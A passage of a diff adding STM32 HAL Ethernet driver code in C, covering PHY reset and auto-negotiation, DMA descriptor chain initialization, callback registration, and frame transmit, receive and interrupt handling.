ETH_DMABMR_SR; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait for software reset */ + while (((heth->Instance)->DMABMR & ETH_DMABMR_SR) != (uint32_t)RESET) + { + /* Check for the Timeout */ + if((HAL_GetTick() - tickstart ) > ETH_TIMEOUT_SWRESET) + { + heth->State= HAL_ETH_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + /* Note: The SWR is not performed if the ETH_RX_CLK or the ETH_TX_CLK are + not available, please check your external PHY or the IO configuration */ + return HAL_TIMEOUT; + } + } + + /*-------------------------------- MAC Initialization ----------------------*/ + /* Get the ETHERNET MACMIIAR value */ + tmpreg1 = (heth->Instance)->MACMIIAR; + /* Clear CSR Clock Range CR[2:0] bits */ + tmpreg1 &= ETH_MACMIIAR_CR_MASK; + + /* Get hclk frequency value */ + hclk = HAL_RCC_GetHCLKFreq(); + + /* Set CR bits depending on hclk value */ + if((hclk >= 20000000U)&&(hclk < 35000000U)) + { + /* CSR Clock Range between 20-35 MHz */ + tmpreg1 |= (uint32_t)ETH_MACMIIAR_CR_Div16; + } + else if((hclk >= 35000000U)&&(hclk < 60000000U)) + { + /* CSR Clock Range between 35-60 MHz */ + tmpreg1 |= (uint32_t)ETH_MACMIIAR_CR_Div26; + } + else if((hclk >= 60000000U)&&(hclk < 100000000U)) + { + /* CSR Clock Range between 60-100 MHz */ + tmpreg1 |= (uint32_t)ETH_MACMIIAR_CR_Div42; + } + else if((hclk >= 100000000U)&&(hclk < 150000000U)) + { + /* CSR Clock Range between 100-150 MHz */ + tmpreg1 |= (uint32_t)ETH_MACMIIAR_CR_Div62; + } + else /* ((hclk >= 150000000)&&(hclk <= 183000000)) */ + { + /* CSR Clock Range between 150-183 MHz */ + tmpreg1 |= (uint32_t)ETH_MACMIIAR_CR_Div102; + } + + /* Write to ETHERNET MAC MIIAR: Configure the ETHERNET CSR Clock Range */ + (heth->Instance)->MACMIIAR = (uint32_t)tmpreg1; + + /*-------------------- PHY initialization and configuration ----------------*/ + /* Put the PHY in reset mode */ + if((HAL_ETH_WritePHYRegister(heth, PHY_BCR, PHY_RESET)) != HAL_OK) + { + /* In case of write timeout */ + err = ETH_ERROR; + + /* Config MAC and DMA */ + ETH_MACDMAConfig(heth, err); + + /* Set the ETH peripheral state to READY */ + heth->State = HAL_ETH_STATE_READY; + + /* Return HAL_ERROR */ + return HAL_ERROR; + } + + /* Delay to assure PHY reset */ + HAL_Delay(PHY_RESET_DELAY); + + if((heth->Init).AutoNegotiation != ETH_AUTONEGOTIATION_DISABLE) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + /* We wait for linked status */ + do + { + HAL_ETH_ReadPHYRegister(heth, PHY_BSR, &phyreg); + + /* Check for the Timeout */ + if((HAL_GetTick() - tickstart ) > ETH_TIMEOUT_LINKED_STATE) + { + /* In case of write timeout */ + err = ETH_ERROR; + + /* Config MAC and DMA */ + ETH_MACDMAConfig(heth, err); + + heth->State= HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + return HAL_TIMEOUT; + } + } while (((phyreg & PHY_LINKED_STATUS) != PHY_LINKED_STATUS)); + + + /* Enable Auto-Negotiation */ + if((HAL_ETH_WritePHYRegister(heth, PHY_BCR, PHY_AUTONEGOTIATION)) != HAL_OK) + { + /* In case of write timeout */ + err = ETH_ERROR; + + /* Config MAC and DMA */ + ETH_MACDMAConfig(heth, err); + + /* Set the ETH peripheral state to READY */ + heth->State = HAL_ETH_STATE_READY; + + /* Return HAL_ERROR */ + return HAL_ERROR; + } + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until the auto-negotiation will be completed */ + do + { + HAL_ETH_ReadPHYRegister(heth, PHY_BSR, &phyreg); + + /* Check for the Timeout */ + if((HAL_GetTick() - tickstart ) > ETH_TIMEOUT_AUTONEGO_COMPLETED) + { + /* In case of write timeout */ + err = ETH_ERROR; + + /* Config MAC and DMA */ + ETH_MACDMAConfig(heth, err); + + heth->State= HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + return HAL_TIMEOUT; + } + + } while (((phyreg & PHY_AUTONEGO_COMPLETE) != PHY_AUTONEGO_COMPLETE)); + + /* Read the result of the auto-negotiation */ + if((HAL_ETH_ReadPHYRegister(heth, PHY_SR, &phyreg)) != HAL_OK) + { + /* In case of write timeout */ + err = ETH_ERROR; + + /* Config MAC and DMA */ + ETH_MACDMAConfig(heth, err); + + /* Set the ETH peripheral state to READY */ + heth->State = HAL_ETH_STATE_READY; + + /* Return HAL_ERROR */ + return HAL_ERROR; + } + + /* Configure the MAC with the Duplex Mode fixed by the auto-negotiation process */ + if((phyreg & PHY_DUPLEX_STATUS) != (uint32_t)RESET) + { + /* Set Ethernet duplex mode to Full-duplex following the auto-negotiation */ + (heth->Init).DuplexMode = ETH_MODE_FULLDUPLEX; + } + else + { + /* Set Ethernet duplex mode to Half-duplex following the auto-negotiation */ + (heth->Init).DuplexMode = ETH_MODE_HALFDUPLEX; + } + /* Configure the MAC with the speed fixed by the auto-negotiation process */ + if((phyreg & PHY_SPEED_STATUS) == PHY_SPEED_STATUS) + { + /* Set Ethernet speed to 10M following the auto-negotiation */ + (heth->Init).Speed = ETH_SPEED_10M; + } + else + { + /* Set Ethernet speed to 100M following the auto-negotiation */ + (heth->Init).Speed = ETH_SPEED_100M; + } + } + else /* AutoNegotiation Disable */ + { + /* Check parameters */ + assert_param(IS_ETH_SPEED(heth->Init.Speed)); + assert_param(IS_ETH_DUPLEX_MODE(heth->Init.DuplexMode)); + + /* Set MAC Speed and Duplex Mode */ + if(HAL_ETH_WritePHYRegister(heth, PHY_BCR, ((uint16_t)((heth->Init).DuplexMode >> 3U) | + (uint16_t)((heth->Init).Speed >> 1U))) != HAL_OK) + { + /* In case of write timeout */ + err = ETH_ERROR; + + /* Config MAC and DMA */ + ETH_MACDMAConfig(heth, err); + + /* Set the ETH peripheral state to READY */ + heth->State = HAL_ETH_STATE_READY; + + /* Return HAL_ERROR */ + return HAL_ERROR; + } + + /* Delay to assure PHY configuration */ + HAL_Delay(PHY_CONFIG_DELAY); + } + + /* Config MAC and DMA */ + ETH_MACDMAConfig(heth, err); + + /* Set ETH HAL State to Ready */ + heth->State= HAL_ETH_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief De-Initializes the ETH peripheral. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ETH_DeInit(ETH_HandleTypeDef *heth) +{ + /* Set the ETH peripheral state to BUSY */ + heth->State = HAL_ETH_STATE_BUSY; + +#if (USE_HAL_ETH_REGISTER_CALLBACKS == 1) + if(heth->MspDeInitCallback == NULL) + { + heth->MspDeInitCallback = HAL_ETH_MspDeInit; + } + /* De-Init the low level hardware : GPIO, CLOCK, NVIC. */ + heth->MspDeInitCallback(heth); +#else + /* De-Init the low level hardware : GPIO, CLOCK, NVIC. */ + HAL_ETH_MspDeInit(heth); +#endif + + /* Set ETH HAL state to Disabled */ + heth->State= HAL_ETH_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(heth); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Initializes the DMA Tx descriptors in chain mode. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @param DMATxDescTab Pointer to the first Tx desc list + * @param TxBuff Pointer to the first TxBuffer list + * @param TxBuffCount Number of the used Tx desc in the list + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ETH_DMATxDescListInit(ETH_HandleTypeDef *heth, ETH_DMADescTypeDef *DMATxDescTab, uint8_t *TxBuff, uint32_t TxBuffCount) +{ + uint32_t i = 0U; + ETH_DMADescTypeDef *dmatxdesc; + + /* Process Locked */ + __HAL_LOCK(heth); + + /* Set the ETH peripheral state to BUSY */ + heth->State = HAL_ETH_STATE_BUSY; + + /* Set the DMATxDescToSet pointer with the first one of the DMATxDescTab list */ + heth->TxDesc = DMATxDescTab; + + /* Fill each DMATxDesc descriptor with the right values */ + for(i=0U; i < TxBuffCount; i++) + { + /* Get the pointer on the ith member of the Tx Desc list */ + dmatxdesc = DMATxDescTab + i; + + /* Set Second Address Chained bit */ + dmatxdesc->Status = ETH_DMATXDESC_TCH; + + /* Set Buffer1 address pointer */ + dmatxdesc->Buffer1Addr = (uint32_t)(&TxBuff[i*ETH_TX_BUF_SIZE]); + + if ((heth->Init).ChecksumMode == ETH_CHECKSUM_BY_HARDWARE) + { + /* Set the DMA Tx descriptors checksum insertion */ + dmatxdesc->Status |= ETH_DMATXDESC_CHECKSUMTCPUDPICMPFULL; + } + + /* Initialize the next descriptor with the Next Descriptor Polling Enable */ + if(i < (TxBuffCount-1U)) + { + /* Set next descriptor address register with next descriptor base address */ + dmatxdesc->Buffer2NextDescAddr = (uint32_t)(DMATxDescTab+i+1U); + } + else + { + /* For last descriptor, set next descriptor address register equal to the first descriptor base address */ + dmatxdesc->Buffer2NextDescAddr = (uint32_t) DMATxDescTab; + } + } + + /* Set Transmit Descriptor List Address Register */ + (heth->Instance)->DMATDLAR = (uint32_t) DMATxDescTab; + + /* Set ETH HAL State to Ready */ + heth->State= HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Initializes the DMA Rx descriptors in chain mode. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @param DMARxDescTab Pointer to the first Rx desc list + * @param RxBuff Pointer to the first RxBuffer list + * @param RxBuffCount Number of the used Rx desc in the list + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ETH_DMARxDescListInit(ETH_HandleTypeDef *heth, ETH_DMADescTypeDef *DMARxDescTab, uint8_t *RxBuff, uint32_t RxBuffCount) +{ + uint32_t i = 0U; + ETH_DMADescTypeDef *DMARxDesc; + + /* Process Locked */ + __HAL_LOCK(heth); + + /* Set the ETH peripheral state to BUSY */ + heth->State = HAL_ETH_STATE_BUSY; + + /* Set the Ethernet RxDesc pointer with the first one of the DMARxDescTab list */ + heth->RxDesc = DMARxDescTab; + + /* Fill each DMARxDesc descriptor with the right values */ + for(i=0U; i < RxBuffCount; i++) + { + /* Get the pointer on the ith member of the Rx Desc list */ + DMARxDesc = DMARxDescTab+i; + + /* Set Own bit of the Rx descriptor Status */ + DMARxDesc->Status = ETH_DMARXDESC_OWN; + + /* Set Buffer1 size and Second Address Chained bit */ + DMARxDesc->ControlBufferSize = ETH_DMARXDESC_RCH | ETH_RX_BUF_SIZE; + + /* Set Buffer1 address pointer */ + DMARxDesc->Buffer1Addr = (uint32_t)(&RxBuff[i*ETH_RX_BUF_SIZE]); + + if((heth->Init).RxMode == ETH_RXINTERRUPT_MODE) + { + /* Enable Ethernet DMA Rx Descriptor interrupt */ + DMARxDesc->ControlBufferSize &= ~ETH_DMARXDESC_DIC; + } + + /* Initialize the next descriptor with the Next Descriptor Polling Enable */ + if(i < (RxBuffCount-1U)) + { + /* Set next descriptor address register with next descriptor base address */ + DMARxDesc->Buffer2NextDescAddr = (uint32_t)(DMARxDescTab+i+1U); + } + else + { + /* For last descriptor, set next descriptor address register equal to the first descriptor base address */ + DMARxDesc->Buffer2NextDescAddr = (uint32_t)(DMARxDescTab); + } + } + + /* Set Receive Descriptor List Address Register */ + (heth->Instance)->DMARDLAR = (uint32_t) DMARxDescTab; + + /* Set ETH HAL State to Ready */ + heth->State= HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Initializes the ETH MSP. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval None + */ +__weak void HAL_ETH_MspInit(ETH_HandleTypeDef *heth) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(heth); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_ETH_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitializes ETH MSP. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval None + */ +__weak void HAL_ETH_MspDeInit(ETH_HandleTypeDef *heth) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(heth); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_ETH_MspDeInit could be implemented in the user file + */ +} + +#if (USE_HAL_ETH_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User ETH Callback + * To be used instead of the weak predefined callback + * @param heth eth handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_ETH_TX_COMPLETE_CB_ID Tx Complete Callback ID + * @arg @ref HAL_ETH_RX_COMPLETE_CB_ID Rx Complete Callback ID + * @arg @ref HAL_ETH_DMA_ERROR_CB_ID DMA Error Callback ID + * @arg @ref HAL_ETH_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_ETH_MSPDEINIT_CB_ID MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_ETH_RegisterCallback(ETH_HandleTypeDef *heth, HAL_ETH_CallbackIDTypeDef CallbackID, pETH_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(pCallback == NULL) + { + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(heth); + + if(heth->State == HAL_ETH_STATE_READY) + { + switch (CallbackID) + { + case HAL_ETH_TX_COMPLETE_CB_ID : + heth->TxCpltCallback = pCallback; + break; + + case HAL_ETH_RX_COMPLETE_CB_ID : + heth->RxCpltCallback = pCallback; + break; + + case HAL_ETH_DMA_ERROR_CB_ID : + heth->DMAErrorCallback = pCallback; + break; + + case HAL_ETH_MSPINIT_CB_ID : + heth->MspInitCallback = pCallback; + break; + + case HAL_ETH_MSPDEINIT_CB_ID : + heth->MspDeInitCallback = pCallback; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if(heth->State == HAL_ETH_STATE_RESET) + { + switch (CallbackID) + { + case HAL_ETH_MSPINIT_CB_ID : + heth->MspInitCallback = pCallback; + break; + + case HAL_ETH_MSPDEINIT_CB_ID : + heth->MspDeInitCallback = pCallback; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(heth); + + return status; +} + +/** + * @brief Unregister an ETH Callback + * ETH callabck is redirected to the weak predefined callback + * @param heth eth handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_ETH_TX_COMPLETE_CB_ID Tx Complete Callback ID + * @arg @ref HAL_ETH_RX_COMPLETE_CB_ID Rx Complete Callback ID + * @arg @ref HAL_ETH_DMA_ERROR_CB_ID DMA Error Callback ID + * @arg @ref HAL_ETH_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_ETH_MSPDEINIT_CB_ID MspDeInit callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_ETH_UnRegisterCallback(ETH_HandleTypeDef *heth, HAL_ETH_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(heth); + + if(heth->State == HAL_ETH_STATE_READY) + { + switch (CallbackID) + { + case HAL_ETH_TX_COMPLETE_CB_ID : + heth->TxCpltCallback = HAL_ETH_TxCpltCallback; + break; + + case HAL_ETH_RX_COMPLETE_CB_ID : + heth->RxCpltCallback = HAL_ETH_RxCpltCallback; + break; + + case HAL_ETH_DMA_ERROR_CB_ID : + heth->DMAErrorCallback = HAL_ETH_ErrorCallback; + break; + + case HAL_ETH_MSPINIT_CB_ID : + heth->MspInitCallback = HAL_ETH_MspInit; + break; + + case HAL_ETH_MSPDEINIT_CB_ID : + heth->MspDeInitCallback = HAL_ETH_MspDeInit; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if(heth->State == HAL_ETH_STATE_RESET) + { + switch (CallbackID) + { + case HAL_ETH_MSPINIT_CB_ID : + heth->MspInitCallback = HAL_ETH_MspInit; + break; + + case HAL_ETH_MSPDEINIT_CB_ID : + heth->MspDeInitCallback = HAL_ETH_MspDeInit; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(heth); + + return status; +} +#endif /* USE_HAL_ETH_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup ETH_Exported_Functions_Group2 IO operation functions + * @brief Data transfers functions + * + @verbatim + ============================================================================== + ##### IO operation functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Transmit a frame + HAL_ETH_TransmitFrame(); + (+) Receive a frame + HAL_ETH_GetReceivedFrame(); + HAL_ETH_GetReceivedFrame_IT(); + (+) Read from an External PHY register + HAL_ETH_ReadPHYRegister(); + (+) Write to an External PHY register + HAL_ETH_WritePHYRegister(); + + @endverbatim + + * @{ + */ + +/** + * @brief Sends an Ethernet frame. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @param FrameLength Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ETH_TransmitFrame(ETH_HandleTypeDef *heth, uint32_t FrameLength) +{ + uint32_t bufcount = 0U, size = 0U, i = 0U; + + /* Process Locked */ + __HAL_LOCK(heth); + + /* Set the ETH peripheral state to BUSY */ + heth->State = HAL_ETH_STATE_BUSY; + + if (FrameLength == 0U) + { + /* Set ETH HAL state to READY */ + heth->State = HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + return HAL_ERROR; + } + + /* Check if the descriptor is owned by the ETHERNET DMA (when set) or CPU (when reset) */ + if(((heth->TxDesc)->Status & ETH_DMATXDESC_OWN) != (uint32_t)RESET) + { + /* OWN bit set */ + heth->State = HAL_ETH_STATE_BUSY_TX; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + return HAL_ERROR; + } + + /* Get the number of needed Tx buffers for the current frame */ + if (FrameLength > ETH_TX_BUF_SIZE) + { + bufcount = FrameLength/ETH_TX_BUF_SIZE; + if (FrameLength % ETH_TX_BUF_SIZE) + { + bufcount++; + } + } + else + { + bufcount = 1U; + } + if (bufcount == 1U) + { + /* Set LAST and FIRST segment */ + heth->TxDesc->Status |=ETH_DMATXDESC_FS|ETH_DMATXDESC_LS; + /* Set frame size */ + heth->TxDesc->ControlBufferSize = (FrameLength & ETH_DMATXDESC_TBS1); + /* Set Own bit of the Tx descriptor Status: gives the buffer back to ETHERNET DMA */ + heth->TxDesc->Status |= ETH_DMATXDESC_OWN; + /* Point to next descriptor */ + heth->TxDesc= (ETH_DMADescTypeDef *)(heth->TxDesc->Buffer2NextDescAddr); + } + else + { + for (i=0U; i< bufcount; i++) + { + /* Clear FIRST and LAST segment bits */ + heth->TxDesc->Status &= ~(ETH_DMATXDESC_FS | ETH_DMATXDESC_LS); + + if (i == 0U) + { + /* Setting the first segment bit */ + heth->TxDesc->Status |= ETH_DMATXDESC_FS; + } + + /* Program size */ + heth->TxDesc->ControlBufferSize = (ETH_TX_BUF_SIZE & ETH_DMATXDESC_TBS1); + + if (i == (bufcount-1U)) + { + /* Setting the last segment bit */ + heth->TxDesc->Status |= ETH_DMATXDESC_LS; + size = FrameLength - (bufcount-1U)*ETH_TX_BUF_SIZE; + heth->TxDesc->ControlBufferSize = (size & ETH_DMATXDESC_TBS1); + } + + /* Set Own bit of the Tx descriptor Status: gives the buffer back to ETHERNET DMA */ + heth->TxDesc->Status |= ETH_DMATXDESC_OWN; + /* point to next descriptor */ + heth->TxDesc = (ETH_DMADescTypeDef *)(heth->TxDesc->Buffer2NextDescAddr); + } + } + + /* When Tx Buffer unavailable flag is set: clear it and resume transmission */ + if (((heth->Instance)->DMASR & ETH_DMASR_TBUS) != (uint32_t)RESET) + { + /* Clear TBUS ETHERNET DMA flag */ + (heth->Instance)->DMASR = ETH_DMASR_TBUS; + /* Resume DMA transmission*/ + (heth->Instance)->DMATPDR = 0U; + } + + /* Set ETH HAL State to Ready */ + heth->State = HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Checks for received frames. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ETH_GetReceivedFrame(ETH_HandleTypeDef *heth) +{ + uint32_t framelength = 0U; + + /* Process Locked */ + __HAL_LOCK(heth); + + /* Check the ETH state to BUSY */ + heth->State = HAL_ETH_STATE_BUSY; + + /* Check if segment is not owned by DMA */ + /* (((heth->RxDesc->Status & ETH_DMARXDESC_OWN) == (uint32_t)RESET) && ((heth->RxDesc->Status & ETH_DMARXDESC_LS) != (uint32_t)RESET)) */ + if(((heth->RxDesc->Status & ETH_DMARXDESC_OWN) == (uint32_t)RESET)) + { + /* Check if last segment */ + if(((heth->RxDesc->Status & ETH_DMARXDESC_LS) != (uint32_t)RESET)) + { + /* increment segment count */ + (heth->RxFrameInfos).SegCount++; + + /* Check if last segment is first segment: one segment contains the frame */ + if ((heth->RxFrameInfos).SegCount == 1U) + { + (heth->RxFrameInfos).FSRxDesc =heth->RxDesc; + } + + heth->RxFrameInfos.LSRxDesc = heth->RxDesc; + + /* Get the Frame Length of the received packet: substruct 4 bytes of the CRC */ + framelength = (((heth->RxDesc)->Status & ETH_DMARXDESC_FL) >> ETH_DMARXDESC_FRAMELENGTHSHIFT) - 4U; + heth->RxFrameInfos.length = framelength; + + /* Get the address of the buffer start address */ + heth->RxFrameInfos.buffer = ((heth->RxFrameInfos).FSRxDesc)->Buffer1Addr; + /* point to next descriptor */ + heth->RxDesc = (ETH_DMADescTypeDef*) ((heth->RxDesc)->Buffer2NextDescAddr); + + /* Set HAL State to Ready */ + heth->State = HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + /* Return function status */ + return HAL_OK; + } + /* Check if first segment */ + else if((heth->RxDesc->Status & ETH_DMARXDESC_FS) != (uint32_t)RESET) + { + (heth->RxFrameInfos).FSRxDesc = heth->RxDesc; + (heth->RxFrameInfos).LSRxDesc = NULL; + (heth->RxFrameInfos).SegCount = 1U; + /* Point to next descriptor */ + heth->RxDesc = (ETH_DMADescTypeDef*) (heth->RxDesc->Buffer2NextDescAddr); + } + /* Check if intermediate segment */ + else + { + (heth->RxFrameInfos).SegCount++; + /* Point to next descriptor */ + heth->RxDesc = (ETH_DMADescTypeDef*) (heth->RxDesc->Buffer2NextDescAddr); + } + } + + /* Set ETH HAL State to Ready */ + heth->State = HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + /* Return function status */ + return HAL_ERROR; +} + +/** + * @brief Gets the Received frame in interrupt mode. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ETH_GetReceivedFrame_IT(ETH_HandleTypeDef *heth) +{ + uint32_t descriptorscancounter = 0U; + + /* Process Locked */ + __HAL_LOCK(heth); + + /* Set ETH HAL State to BUSY */ + heth->State = HAL_ETH_STATE_BUSY; + + /* Scan descriptors owned by CPU */ + while (((heth->RxDesc->Status & ETH_DMARXDESC_OWN) == (uint32_t)RESET) && (descriptorscancounter < ETH_RXBUFNB)) + { + /* Just for security */ + descriptorscancounter++; + + /* Check if first segment in frame */ + /* ((heth->RxDesc->Status & ETH_DMARXDESC_FS) != (uint32_t)RESET) && ((heth->RxDesc->Status & ETH_DMARXDESC_LS) == (uint32_t)RESET)) */ + if((heth->RxDesc->Status & (ETH_DMARXDESC_FS | ETH_DMARXDESC_LS)) == (uint32_t)ETH_DMARXDESC_FS) + { + heth->RxFrameInfos.FSRxDesc = heth->RxDesc; + heth->RxFrameInfos.SegCount = 1U; + /* Point to next descriptor */ + heth->RxDesc = (ETH_DMADescTypeDef*) (heth->RxDesc->Buffer2NextDescAddr); + } + /* Check if intermediate segment */ + /* ((heth->RxDesc->Status & ETH_DMARXDESC_LS) == (uint32_t)RESET)&& ((heth->RxDesc->Status & ETH_DMARXDESC_FS) == (uint32_t)RESET)) */ + else if ((heth->RxDesc->Status & (ETH_DMARXDESC_LS | ETH_DMARXDESC_FS)) == (uint32_t)RESET) + { + /* Increment segment count */ + (heth->RxFrameInfos.SegCount)++; + /* Point to next descriptor */ + heth->RxDesc = (ETH_DMADescTypeDef*)(heth->RxDesc->Buffer2NextDescAddr); + } + /* Should be last segment */ + else + { + /* Last segment */ + heth->RxFrameInfos.LSRxDesc = heth->RxDesc; + + /* Increment segment count */ + (heth->RxFrameInfos.SegCount)++; + + /* Check if last segment is first segment: one segment contains the frame */ + if ((heth->RxFrameInfos.SegCount) == 1U) + { + heth->RxFrameInfos.FSRxDesc = heth->RxDesc; + } + + /* Get the Frame Length of the received packet: substruct 4 bytes of the CRC */ + heth->RxFrameInfos.length = (((heth->RxDesc)->Status & ETH_DMARXDESC_FL) >> ETH_DMARXDESC_FRAMELENGTHSHIFT) - 4U; + + /* Get the address of the buffer start address */ + heth->RxFrameInfos.buffer =((heth->RxFrameInfos).FSRxDesc)->Buffer1Addr; + + /* Point to next descriptor */ + heth->RxDesc = (ETH_DMADescTypeDef*) (heth->RxDesc->Buffer2NextDescAddr); + + /* Set HAL State to Ready */ + heth->State = HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + /* Return function status */ + return HAL_OK; + } + } + + /* Set HAL State to Ready */ + heth->State = HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + /* Return function status */ + return HAL_ERROR; +} + +/** + * @brief This function handles ETH interrupt request. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval HAL status + */ +void HAL_ETH_IRQHandler(ETH_HandleTypeDef *heth) +{ + /* Frame received */ + if (__HAL_ETH_DMA_GET_FLAG(heth, ETH_DMA_FLAG_R)) + { +#if (USE_HAL_ETH_REGISTER_CALLBACKS == 1) + /*Call registered Receive complete callback*/ + heth->RxCpltCallback(heth); +#else + /* Receive complete callback */ + HAL_ETH_RxCpltCallback(heth); +#endif /* USE_HAL_ETH_REGISTER_CALLBACKS */ + + /* Clear the Eth DMA Rx IT pending bits */ + __HAL_ETH_DMA_CLEAR_IT(heth, ETH_DMA_IT_R); + + /* Set HAL State to Ready */ + heth->State = HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + + } + /* Frame transmitted */ + else if (__HAL_ETH_DMA_GET_FLAG(heth, ETH_DMA_FLAG_T)) + { +#if (USE_HAL_ETH_REGISTER_CALLBACKS == 1) + /* Call resgistered Transfer complete callback*/ + heth->TxCpltCallback(heth); +#else + /* Transfer complete callback */ + HAL_ETH_TxCpltCallback(heth); +#endif /* USE_HAL_ETH_REGISTER_CALLBACKS */ + + /* Clear the Eth DMA Tx IT pending bits */ + __HAL_ETH_DMA_CLEAR_IT(heth, ETH_DMA_IT_T); + + /* Set HAL State to Ready */ + heth->State = HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + } + + /* Clear the interrupt flags */ + __HAL_ETH_DMA_CLEAR_IT(heth, ETH_DMA_IT_NIS); + + /* ETH DMA Error */ + if(__HAL_ETH_DMA_GET_FLAG(heth, ETH_DMA_FLAG_AIS)) + { +#if (USE_HAL_ETH_REGISTER_CALLBACKS == 1) + heth->DMAErrorCallback(heth); +#else + /* Ethernet Error callback */ + HAL_ETH_ErrorCallback(heth); +#endif /* USE_HAL_ETH_REGISTER_CALLBACKS */ + + /* Clear the interrupt flags */ + __HAL_ETH_DMA_CLEAR_IT(heth, ETH_DMA_FLAG_AIS); + + /* Set HAL State to Ready */ + heth->State = HAL_ETH_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(heth); + } +} + +/** + * @brief Tx Transfer completed callbacks. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval None + */ +__weak void HAL_ETH_TxCpltCallback(ETH_HandleTypeDef *heth) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(heth); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_ETH_TxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Rx Transfer completed callbacks. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval None + */ +__weak void HAL_ETH_RxCpltCallback(ETH_HandleTypeDef *heth) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(heth); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_ETH_TxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Ethernet transfer error callbacks + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval None + */ +__weak void HAL_ETH_ErrorCallback(ETH_HandleTypeDef *heth) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(heth); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_ETH_TxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Reads a PHY register + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @param PHYReg PHY register address, is the index of one of the 32 PHY register. + * This parameter can be one of the following values: + * PHY_BCR: Transceiver Basic Control Register, + * PHY_BSR: Transceiver Basic Status Register. + * More PHY register could be read depending on the used PHY + * @param RegValue PHY register value + * @retval HAL status + */ +HAL_StatusTypeDef 